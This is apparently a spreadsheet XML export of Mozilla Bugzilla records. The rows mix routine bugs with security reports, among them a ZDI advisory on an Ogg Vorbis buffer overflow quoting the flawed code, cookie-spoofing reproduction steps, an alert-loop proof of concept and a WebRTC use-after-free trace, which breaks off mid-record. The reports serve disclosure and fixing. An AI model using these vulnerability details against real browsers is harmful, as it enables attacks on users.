      <c r="M977" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N977" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O977" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P977" t="inlineStr">
        <is>
          <t>u=user c=AoA p=1</t>
        </is>
      </c>
      <c r="Q977" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R977" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S977" t="inlineStr">
        <is>
          <t>2012.12</t>
        </is>
      </c>
      <c r="T977" t="n">
        <v>1</v>
      </c>
      <c r="U977" t="n">
        <v>0</v>
      </c>
      <c r="V977" t="n">
        <v>8</v>
      </c>
      <c r="W977" t="inlineStr">
        <is>
          <t>Add a message to the dialog that we show users before we send them to Twitter that they can stay logged in when they sign up on our site.</t>
        </is>
      </c>
      <c r="X977" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="978">
      <c r="A978" t="n">
        <v>1451475</v>
      </c>
      <c r="B978" t="inlineStr">
        <is>
          <t>2018-04-04 13:24:01 -0700</t>
        </is>
      </c>
      <c r="C978" t="inlineStr">
        <is>
          <t>Renew scalar browser.engagement.restored_pinned_tabs_count</t>
        </is>
      </c>
      <c r="D978" t="inlineStr">
        <is>
          <t>2018-04-13 09:05:22 -0700</t>
        </is>
      </c>
      <c r="E978" t="n">
        <v>1</v>
      </c>
      <c r="F978" t="n">
        <v>1</v>
      </c>
      <c r="G978" t="n">
        <v>2</v>
      </c>
      <c r="H978" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I978" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J978" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K978" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L978" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M978" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N978" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O978" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P978" t="inlineStr"/>
      <c r="Q978" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R978" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S978" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T978" t="n">
        <v>1</v>
      </c>
      <c r="U978" t="n">
        <v>0</v>
      </c>
      <c r="V978" t="n">
        <v>8</v>
      </c>
      <c r="W978" t="inlineStr">
        <is>
          <t>browser.engagement.restored_pinned_tabs_count is about to expire. Its information may become useful within the next five releases, so we should renew it.
This is subject to Data Collection Review: https://wiki.mozilla.org/Firefox/Data_Collection</t>
        </is>
      </c>
      <c r="X978" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="979">
      <c r="A979" t="n">
        <v>227611</v>
      </c>
      <c r="B979" t="inlineStr">
        <is>
          <t>2003-12-05 16:59:20 -0800</t>
        </is>
      </c>
      <c r="C979" t="inlineStr">
        <is>
          <t>Components list should dynamically update when changing the product on the "show_bug.cgi" page</t>
        </is>
      </c>
      <c r="D979" t="inlineStr">
        <is>
          <t>2019-03-09 19:30:35 -0800</t>
        </is>
      </c>
      <c r="E979" t="n">
        <v>1</v>
      </c>
      <c r="F979" t="n">
        <v>1</v>
      </c>
      <c r="G979" t="n">
        <v>4</v>
      </c>
      <c r="H979" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I979" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J979" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K979" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N979" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O979" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P979" t="inlineStr"/>
      <c r="Q979" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R979" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S979" t="inlineStr">
        <is>
          <t>Bugzilla 6.0</t>
        </is>
      </c>
      <c r="T979" t="n">
        <v>1</v>
      </c>
      <c r="U979" t="n">
        <v>9</v>
      </c>
      <c r="V979" t="n">
        <v>44</v>
      </c>
      <c r="W979" t="inlineStr">
        <is>
          <t>I've just tried to change a Product in an existing bugreport but Component list
was not updated by that change and was still showing component list for "old"
Product.
To reproduce:
1. Open some bugreport at bugzilla.mozilla.org
2. Try to select different Product
3. Observe that Component list was not updated according to the chosen Product</t>
        </is>
      </c>
      <c r="X979" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="980">
      <c r="A980" t="n">
        <v>138892</v>
      </c>
      <c r="B980" t="inlineStr">
        <is>
          <t>2002-04-20 17:43:12 -0700</t>
        </is>
      </c>
      <c r="C980" t="inlineStr">
        <is>
          <t>form data only remembered for first form on page</t>
        </is>
      </c>
      <c r="D980" t="inlineStr">
        <is>
          <t>2011-08-05 22:28:33 -0700</t>
        </is>
      </c>
      <c r="E980" t="n">
        <v>1</v>
      </c>
      <c r="F980" t="n">
        <v>1</v>
      </c>
      <c r="G980" t="n">
        <v>3</v>
      </c>
      <c r="H980" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I980" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J980" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K980" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N980" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O980" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P980" t="inlineStr">
        <is>
          <t>[adt1][m5+][eta 4/29][FIX]</t>
        </is>
      </c>
      <c r="Q980" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R980" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S980" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T980" t="n">
        <v>1</v>
      </c>
      <c r="U980" t="n">
        <v>0</v>
      </c>
      <c r="V980" t="n">
        <v>29</v>
      </c>
      <c r="W980" t="inlineStr">
        <is>
          <t>Form data is only remembered on back/forward for the first form in a page.
I noticed this bug at http://www.cs.hmc.edu/~jruderma/s/, but it also happens at
http://www.plastic.com/users.pl (if you're not logged in).
0314   - wfm
032903 - wfm
033109 - broken
040303 - broken
0419   - broken</t>
        </is>
      </c>
      <c r="X980" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="981">
      <c r="A981" t="n">
        <v>428580</v>
      </c>
      <c r="B981" t="inlineStr">
        <is>
          <t>2008-04-11 14:02:08 -0700</t>
        </is>
      </c>
      <c r="C981" t="inlineStr">
        <is>
          <t>update talos leopard image (10.5 -&gt; 10.5.2 or 10.5.latest)</t>
        </is>
      </c>
      <c r="D981" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E981" t="n">
        <v>1</v>
      </c>
      <c r="F981" t="n">
        <v>1</v>
      </c>
      <c r="G981" t="n">
        <v>5</v>
      </c>
      <c r="H981" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I981" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J981" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K981" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L981" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M981" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N981" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O981" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P981" t="inlineStr"/>
      <c r="Q981" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R981" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S981" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T981" t="n">
        <v>1</v>
      </c>
      <c r="U981" t="n">
        <v>0</v>
      </c>
      <c r="V981" t="n">
        <v>6</v>
      </c>
      <c r="W981" t="inlineStr">
        <is>
          <t>We are currently running 10.5 and it has proven to be more than a little unreliable.  The hope is that updating to a more current version will handle some of the problems that we are seeing.  Here's the history of failures on the currently up leopard machines:
https://bugzilla.mozilla.org/show_bug.cgi?id=413580 (qm-mini-trunk05 unreachables/needs to be rebooted)
https://bugzilla.mozilla.org/show_bug.cgi?id=414408 (qm-pmac-trunk04 unreachable/needs to be rebooted)
https://bugzilla.mozilla.org/show_bug.cgi?id=419730 (qm-pmac-trunk06 needs to be rebooted)
https://bugzilla.mozilla.org/show_bug.cgi?id=420855 (MacOSX Darwin 9.0.0 talos trunk qm-pmac-trunk05 is broken somehow)
https://bugzilla.mozilla.org/show_bug.cgi?id=420896 (qm-pmac-trunk05 needs to be rebooted)
https://bugzilla.mozilla.org/show_bug.cgi?id=422328 (qm-pmac-trunk05 dead)
https://bugzilla.mozilla.org/show_bug.cgi?id=425096 (qm-pmac-trunk04,05,06 unreachable (need to be rebooted))
https://bugzilla.mozilla.org/show_bug.cgi?id=428115 (qm-pmac-trunk04 needs to be rebooted)
https://bugzilla.mozilla.org/show_bug.cgi?id=428393 (qm-pmac-trunk06 reporting untrustworthy numbers)</t>
        </is>
      </c>
      <c r="X981" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="982">
      <c r="A982" t="n">
        <v>793848</v>
      </c>
      <c r="B982" t="inlineStr">
        <is>
          <t>2012-09-24 14:38:26 -0700</t>
        </is>
      </c>
      <c r="C982" t="inlineStr">
        <is>
          <t>Crash with &lt;svg:use&gt; removed during its own scrollbar attribute mutation event</t>
        </is>
      </c>
      <c r="D982" t="inlineStr">
        <is>
          <t>2018-04-03 01:45:30 -0700</t>
        </is>
      </c>
      <c r="E982" t="n">
        <v>1</v>
      </c>
      <c r="F982" t="n">
        <v>1</v>
      </c>
      <c r="G982" t="n">
        <v>3</v>
      </c>
      <c r="H982" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I982" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J982" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K982" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L982" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M982" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N982" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O982" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P982" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+] The current testcase is only useful on recent versions</t>
        </is>
      </c>
      <c r="Q982" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R982" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S982" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T982" t="n">
        <v>1</v>
      </c>
      <c r="U982" t="n">
        <v>0</v>
      </c>
      <c r="V982" t="n">
        <v>21</v>
      </c>
      <c r="W982" t="inlineStr">
        <is>
          <t>Created attachment 664226
testcase (crashes Firefox when loaded)
bp-0cada683-3e71-482d-8d98-0c2d92120924
I'm guessing this is a regression from bug 778810, which added the function mozilla::ScrollbarActivity::ActivityOccurred.
Why does scrolling set DOM attributes?</t>
        </is>
      </c>
      <c r="X982" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="983">
      <c r="A983" t="n">
        <v>577512</v>
      </c>
      <c r="B983" t="inlineStr">
        <is>
          <t>2010-07-08 10:13:57 -0700</t>
        </is>
      </c>
      <c r="C983" t="inlineStr">
        <is>
          <t>(more) cross-domain information leakage with Math.random()</t>
        </is>
      </c>
      <c r="D983" t="inlineStr">
        <is>
          <t>2015-10-16 11:47:44 -0700</t>
        </is>
      </c>
      <c r="E983" t="n">
        <v>1</v>
      </c>
      <c r="F983" t="n">
        <v>1</v>
      </c>
      <c r="G983" t="n">
        <v>3</v>
      </c>
      <c r="H983" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I983" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J983" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K983" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L983" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M983" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N983" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O983" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P983" t="inlineStr">
        <is>
          <t>[sg:low], fixed-in-tracemonkey [qa-needs-str]</t>
        </is>
      </c>
      <c r="Q983" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R983" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S983" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T983" t="n">
        <v>1</v>
      </c>
      <c r="U983" t="n">
        <v>0</v>
      </c>
      <c r="V983" t="n">
        <v>19</v>
      </c>
      <c r="W983" t="inlineStr">
        <is>
          <t>Created attachment 456463
reporter's paper (pdf)
Amit Klein of Trusteer reports that our previous fixes for bug 464071 and bug 475585 were insufficient and sends the attached paper.
He would like to know "within one (1) week from today, whether you confirm and acknowledge the technical nature of the vulnerabilities described in the attachment. Of course, I'm available for questions/discussions/suggestions at any time. If you need an extension, please let me know in advance."
He may be disclosing this issue in the future at "a security conference, in which case I would ask you to defer your own disclosure to a date as close to the conference as possible."
Abstract 
--------
While Mozilla attempted to address the issues of cross domain information leakage (through Math.random) in Firefox 3.6.4 (and above), Firefox 3.5.10 and Firefox 4.0 (alpha and beta), there is still a security vulnerability in the way the isolation is implemented, which enables cross domain leakage. In fact, it may make it easier to attack Firefox in some cases, compared to previous versions.
Additionally, a concerned is raised on the entropy provided in the seed to the Math.random PRNG, which may enable more powerful attacks.</t>
        </is>
      </c>
      <c r="X983" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="984">
      <c r="A984" t="n">
        <v>719612</v>
      </c>
      <c r="B984" t="inlineStr">
        <is>
          <t>2012-01-19 14:55:58 -0800</t>
        </is>
      </c>
      <c r="C984" t="inlineStr">
        <is>
          <t>Mozilla Firefox Ogg Vorbis Decoding Memory Corruption (ZDI-CAN-1477)</t>
        </is>
      </c>
      <c r="D984" t="inlineStr">
        <is>
          <t>2016-03-15 14:27:28 -0700</t>
        </is>
      </c>
      <c r="E984" t="n">
        <v>1</v>
      </c>
      <c r="F984" t="n">
        <v>1</v>
      </c>
      <c r="G984" t="n">
        <v>3</v>
      </c>
      <c r="H984" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I984" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J984" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K984" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L984" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M984" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N984" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O984" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P984" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q984" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R984" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S984" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T984" t="n">
        <v>1</v>
      </c>
      <c r="U984" t="n">
        <v>0</v>
      </c>
      <c r="V984" t="n">
        <v>19</v>
      </c>
      <c r="W984" t="inlineStr">
        <is>
          <t>ZDI-CAN-1477:  Mozilla Firefox Ogg Vorbis Decoding Memory Corruption
Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following
products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Memory corruption is possible when Firefox is parsing Ogg Vorbis
files. The vulnerability is inside the function static
vorbis_info_floor *floor1_unpack (vorbis_info *vi,oggpack_buffer
*opb), in the file
libvorbis/lib/vorbis_floor1.c:
--- code snip begin ---
	...
  for(j=0,k=0;j&lt;info-&gt;partitions;j++){
    count+=info-&gt;class_dim[info-&gt;partitionclass[j]];
    for(;k&lt;count;k++){
      int t=info-&gt;postlist[k+2]=oggpack_read(opb,rangebits);
      if(t&lt;0 || t&gt;=(1&lt;&lt;rangebits))
        goto err_out;
    }
  }
	...
--- code snip end ---
The loop populates the info-&gt;postlist array and can be overflowed. The
values which determine the amount to copy are user influenced. The
info-&gt;class_dim array is populated with user data, with each element
value being between 1 and 8. The info-&gt;partitions value is also taken
from userdata, and can be between 0 and 31. Thus, the total sub-loop
iterations can be 8*31, or 248. Each iteration of the subloop copies
one element (int) into info-&gt;postlist, a fixed-size buffer which is
only sized to 65 elements (int). This results in memory corruption and
can be exploited to gain remote code execution.
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht
---
Confirmed crash in trunk from last night with POC at https://crash-stats.mozilla.com/report/index/bp-3f868463-5f01-4da8-966f-b8a642120119. Firefox 9.0.1 crash at https://crash-stats.mozilla.com/report/index/bp-43276710-2344-4ffb-a68c-041232120119.
Password on POC zip is ZDI-CAN-1477.</t>
        </is>
      </c>
      <c r="X984" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="985">
      <c r="A985" t="n">
        <v>1783536</v>
      </c>
      <c r="B985" t="inlineStr">
        <is>
          <t>2022-08-06 14:03:51 -0700</t>
        </is>
      </c>
      <c r="C985" t="inlineStr">
        <is>
          <t>document.cookie in an insecure origin process allows setting an insecure cookie in that process that has the same name as a secure one</t>
        </is>
      </c>
      <c r="D985" t="inlineStr">
        <is>
          <t>2023-10-17 20:43:35 -0700</t>
        </is>
      </c>
      <c r="E985" t="n">
        <v>1</v>
      </c>
      <c r="F985" t="n">
        <v>1</v>
      </c>
      <c r="G985" t="n">
        <v>3</v>
      </c>
      <c r="H985" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I985" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J985" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K985" t="inlineStr">
        <is>
          <t>Firefox 103</t>
        </is>
      </c>
      <c r="L985" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M985" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N985" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O985" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P985" t="inlineStr">
        <is>
          <t>[necko-triaged][necko-priority-queue][post-critsmash-triage][adv-main112+]</t>
        </is>
      </c>
      <c r="Q985" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R985" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S985" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T985" t="n">
        <v>1</v>
      </c>
      <c r="U985" t="n">
        <v>0</v>
      </c>
      <c r="V985" t="n">
        <v>30</v>
      </c>
      <c r="W985" t="inlineStr">
        <is>
          <t>Created attachment 9288717
ffdesyncsecure.js
Steps to reproduce:
I am reporting a desynchronization issue between document.cookie and the actual content of the cookie jar in Firefox. This report follows https://bugzilla.mozilla.org/show_bug.cgi?id=1782561, but I think these are two separate issues. Similarly to the previous report, this inconsistency could introduce vulnerabilities in applications trusting the cookies read from document.cookie. In particular, this issue may allow same-site and network attackers to spoof the value of a cookie previously set as Secure.
1. Visit https://example.com
2. Set a secure cookie using the console, e.g., document.cookie = "test=secure; Secure"
3. In the same tab, visit http://example.com
4. Set an insecure cookie `test` to the value `insecure`: document.cookie = "test=insecure"
5. Force a refresh to http://example.com
A demo is available at https://ffdesyncsecure.minimal.blue/. Nodejs sources are attached to this report. 
Actual results:
Step 4. sets the cookie `test=insecure` in document.cookie, altough a Secure cookie with the same name (`test`) already exists. Notice that the cookie `test=insecure` is not saved in the cookie jar by inspecting devtools Storage -&gt; Cookies.
Step 5. as expected, the `test` cookie is not attached in the request to http://example.com. At the same time, document.cookie still shows `test=insecure`.
The current behavior causes a desynchronization between document.cookie and the actual cookie jar of the browser.
Expected results:
The document.cookie setter at step 4. should silently fail to set the cookie `test=insecure` due to the presence of a Secure cookie with the same name. Chromium-based browsers behave as expected, i.e., the cookie `test=insecure` does not populate document.cookie.</t>
        </is>
      </c>
      <c r="X985" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="986">
      <c r="A986" t="n">
        <v>594169</v>
      </c>
      <c r="B986" t="inlineStr">
        <is>
          <t>2010-09-07 15:28:54 -0700</t>
        </is>
      </c>
      <c r="C986" t="inlineStr">
        <is>
          <t>Run more instances of MacOSX-64 mochitests-2/5 on try 3f88e9e8c080</t>
        </is>
      </c>
      <c r="D986" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E986" t="n">
        <v>1</v>
      </c>
      <c r="F986" t="n">
        <v>1</v>
      </c>
      <c r="G986" t="n">
        <v>5</v>
      </c>
      <c r="H986" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I986" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J986" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K986" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L986" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M986" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N986" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O986" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P986" t="inlineStr"/>
      <c r="Q986" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R986" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S986" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T986" t="n">
        <v>1</v>
      </c>
      <c r="U986" t="n">
        <v>0</v>
      </c>
      <c r="V986" t="n">
        <v>3</v>
      </c>
      <c r="W986" t="inlineStr">
        <is>
          <t>Could you please kick off a few more instances of MacOSX-64 mochitests-2/5 on try 3f88e9e8c080?  I'd like to know if this doesn't fix the randomorange before I push.</t>
        </is>
      </c>
      <c r="X986" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="987">
      <c r="A987" t="n">
        <v>956524</v>
      </c>
      <c r="B987" t="inlineStr">
        <is>
          <t>2014-01-04 14:51:36 -0800</t>
        </is>
      </c>
      <c r="C987" t="inlineStr">
        <is>
          <t>hanging tab allows attackers to execute JS for a long time in the background, user is not able to close firefox normal</t>
        </is>
      </c>
      <c r="D987" t="inlineStr">
        <is>
          <t>2024-05-30 08:31:48 -0700</t>
        </is>
      </c>
      <c r="E987" t="n">
        <v>1</v>
      </c>
      <c r="F987" t="n">
        <v>1</v>
      </c>
      <c r="G987" t="n">
        <v>2</v>
      </c>
      <c r="H987" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I987" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J987" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K987" t="inlineStr">
        <is>
          <t>26 Branch</t>
        </is>
      </c>
      <c r="L987" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M987" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N987" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O987" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P987" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main28+]</t>
        </is>
      </c>
      <c r="Q987" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R987" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S987" t="inlineStr">
        <is>
          <t>Firefox 29</t>
        </is>
      </c>
      <c r="T987" t="n">
        <v>0</v>
      </c>
      <c r="U987" t="n">
        <v>0</v>
      </c>
      <c r="V987" t="n">
        <v>61</v>
      </c>
      <c r="W987" t="inlineStr">
        <is>
          <t>Created attachment 8355821
hanging_tab.png
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Iron/28.0.1550.1 Chrome/28.0.1550.1 Safari/537.36
Steps to reproduce:
1. Go on http://tim-philipp-schaefers.de/poc/
2. Try to close the box!
3. You are not able to do that. 
A normal User would not find a way to close the browser (with process explorer/task manager), so you are able to execute javascript for a long time. So you are able to calculate bitcoin or sth. like that.
Actual results:
Instead of creating the dialog which allows you to prevent additional dialogs, the page refreshs all the time and creates a new "js-alert" box. 
So for an attacker would it be possible to execute javascript for a long time (perhaps calculate bitcoin or crack hashes ;because some BDU don't know how to kill a process), if someone goes on an effected domain.
Expected results:
Normally if a "js-alert" of a website appears you are able to close it. If you try it two times there is a dialog: "Prevent this page from creating additional dialogs" with the checkbox - but not in this case.
Possible fix:
There should be implemented a control which points out how often a js-alert was shown and if it is several times there should be add the normal dialog: "Prevent this page from creating additional dialogs" with the checkbox.</t>
        </is>
      </c>
      <c r="X987" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="988">
      <c r="A988" t="n">
        <v>1279146</v>
      </c>
      <c r="B988" t="inlineStr">
        <is>
          <t>2016-06-08 22:58:22 -0700</t>
        </is>
      </c>
      <c r="C988" t="inlineStr">
        <is>
          <t>WebRTC - Use After Free in socket thread</t>
        </is>
      </c>
      <c r="D988" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:07 -0700</t>
        </is>
      </c>
      <c r="E988" t="n">
        <v>1</v>
      </c>
      <c r="F988" t="n">
        <v>1</v>
      </c>
      <c r="G988" t="n">
        <v>3</v>
      </c>
      <c r="H988" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I988" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J988" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K988" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L988" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M988" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N988" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O988" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P988" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q988" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R988" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S988" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T988" t="n">
        <v>1</v>
      </c>
      <c r="U988" t="n">
        <v>0</v>
      </c>
      <c r="V988" t="n">
        <v>45</v>
      </c>
      <c r="W988" t="inlineStr">
        <is>
          <t>Created attachment 8761474
UAF_socket_thread.html
Steps to reproduce:
1.Open repro UAF_socket_thread.html in Firefox browser.
2.Firefox crashes at corrupted address in nr_ice_peer_ctx_find_component() in socket thread.
Firefox version: 50.0a1 (2016-06-09)
Exception thrown: read access violation.
pstr was 0x2FE07494.
&gt;	xul.dll!nr_ice_peer_ctx_find_component(nr_ice_peer_ctx_ * pctx, nr_ice_media_stream_ * str, int component_id, nr_ice_component_ * * compp) Line 717	C
 	xul.dll!nr_ice_media_stream_send(nr_ice_peer_ctx_ * pctx, nr_ice_media_stream_ * str, int component, unsigned char * data, int len) Line 734	C
